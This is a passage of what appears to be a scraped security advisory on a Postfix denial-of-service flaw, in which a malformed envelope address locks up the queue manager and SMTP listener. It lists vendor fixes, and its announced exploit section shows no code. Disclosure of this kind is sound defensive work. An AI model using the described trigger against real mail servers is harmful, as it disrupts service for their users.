Wietse Venema Postfix 2.0
Wietse Venema Postfix 1.1.13

- Unaffected program versions

Wietse Venema Postfix 2.0
Wietse Venema Postfix 1.1.13

- Discussion

A denial of service attack can be triggered in Postfix by a malformed envelope address, which can result in the queue manager and SMTP listener locking up.

- Exploit

The following proof-of-concept exploits have been supplied:

- Solution

Conectiva has released advisory CLA-2003:717 with fixes to address this issue. Additional information is available in the referenced advisory. Fixes are linked below.

Debian has issued fixes. See advisory DSA-363-1 listed in the reference section for download locations.

SuSE has released advisory SuSE-SA:2003:033 with fixes to address this issue.

Mandrake has released advisory MDKSA-2003:081 with fixes to address this issue. Additional information is available in the referenced Mandrake Advisory.

Red Hat has released advisory RHSA-2003:251-01. Fix information may be gathered from the referenced advisory.

Guardian Digital has released an advisory (ESA-20030804-019) that provides updates for EnGarde Secure Linux. These updates may be applied automatically with the Guardian Digital WebTool. Please see the attached advisory for instructions on how to apply updates.

Trustix has released an advisory (TSLSA-2003-0029) that addresses this issue. Please see the attached advisory for details on obtaining and applying upgrades.

Vulnerable versions of the software can be fixed by upgrading to Postfix 1.1.13.


Wietse Venema Postfix 20011115

Wietse Venema Postfix 19991231

Wietse Venema Postfix 19990906

Wietse Venema Postfix 20010228

Wietse Venema Postfix 1.0.21

Wietse Venema Postfix 1.1.11

Wietse Venema Postfix 1.1.12

Conectiva Linux 7.0

Conectiva Linux 8.0

- References

 

 
